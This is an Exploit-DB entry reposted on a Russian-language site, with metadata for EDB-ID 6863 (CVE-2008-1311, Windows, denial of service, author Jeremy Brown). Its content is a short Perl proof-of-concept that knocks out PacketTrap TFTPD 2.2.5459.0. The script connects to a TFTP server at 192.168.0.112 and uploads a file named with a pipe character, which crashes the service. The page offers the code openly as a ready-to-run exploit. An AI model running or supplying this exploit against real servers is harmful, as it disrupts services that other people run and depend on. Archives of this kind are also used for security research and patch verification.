- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6863
- Проверка EDB
-
- Пройдено
- Автор
- JEREMY BROWN
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-1311
- Дата публикации
- 2008-10-29
Код:
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com
# Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;)
# A product of tftpfuzz.pl (coming soon)
use Net::TFTP;
use Getopt::Std;
$tftp = Net::TFTP->new("192.168.0.112");
$tftp->ascii;
$tftp->put("test", "|");
exit;
# milw0rm.com [2008-10-29]
- Источник
- www.exploit-db.com